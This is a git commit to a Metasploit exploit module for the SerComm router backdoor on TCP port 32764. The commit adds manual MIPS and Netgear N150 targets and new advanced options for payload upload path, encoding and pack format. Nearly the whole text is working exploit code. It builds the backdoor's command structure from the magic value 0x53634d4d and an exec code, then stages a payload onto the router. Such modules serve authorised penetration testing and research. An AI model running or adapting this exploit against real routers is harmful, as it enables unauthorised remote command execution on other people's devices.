Add Manual targets to sercomm_exec

2014-01-16 12:44:14 -06:00 · 2014-01-16 12:44:14 -06:00 · 139119d32c
parent 0922aef8d1
commit 139119d32c
1 changed files with 44 additions and 5 deletions
--- a/modules/exploits/linux/misc/sercomm_exec.rb
+++ b/modules/exploits/linux/misc/sercomm_exec.rb
@ -47,6 +47,16 @@ class Metasploit3 < Msf::Exploit::Remote
              'PackFormat' => 'NNN'
            }
          ],
+          ['Manual Linux MIPS Big Endian',
+            {
+              'Arch' => ARCH_MIPSBE
+            }
+          ],
+          ['Manual Linux MIPS Little Endian',
+            {
+              'Arch' => ARCH_MIPSLE
+            }
+          ],
          ['Cisco WAP4410N',
            {
              # Note this target is little endian by network comm, but
@ -65,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
-              'NoArgs' => true,
+              'NoArgs' => true
            }
          ],
          ['Netgear DG834G',
@ -108,6 +118,13 @@ class Metasploit3 < Msf::Exploit::Remote
              'PayloadEncode' => 'octal'
            }
          ],
+          ['Netgear N150',
+            {
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'VVV',
+              'NoArgs' => true
+            }
+          ]
        ],
      'DefaultTarget'  => 0,
      'References'     =>
@ -121,6 +138,15 @@ class Metasploit3 < Msf::Exploit::Remote
        [
          Opt::RPORT(32764)
        ], self.class)
+
+      register_advanced_options(
+        [
+          OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
+          OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
+          OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
+          OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
+        ], self.class)
+
  end

  def check
@ -139,10 +165,23 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def exploit
+    if target.name =~ /Manual/
+      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")
+      @no_args = datastore['NOARGS']
+      @upload_path = datastore['UPLOADPATH']
+      @encoding_format = datastore['ENCODING']
+      @pack_format = datastore['PACKFORMAT']
+    else
+      @no_args = target['NoArgs']
+      @upload_path = target['UploadPath']
+      @encoding_format = target['PayloadEncode']
+      @pack_format = target['PackFormat']
+    end
+
    execute_cmdstager(
-      :noargs => target['NoArgs'],
-      :temp => target['UploadPath'],
-      :enc_format => target['PayloadEncode']
+      :noargs => @no_args,
+      :temp => @upload_path,
+      :enc_format => @encoding_format
    )
  end

@ -176,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
    # 0x53634d4d  => Backdoor code
    # 0x07        => Exec command
    # cmd_length  => Length of command to execute, sent after communication struct
-    data = [0x53634d4d, 0x07, cmd_length].pack(target['PackFormat'])
+    data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)

    connect
    # Send command structure followed by command text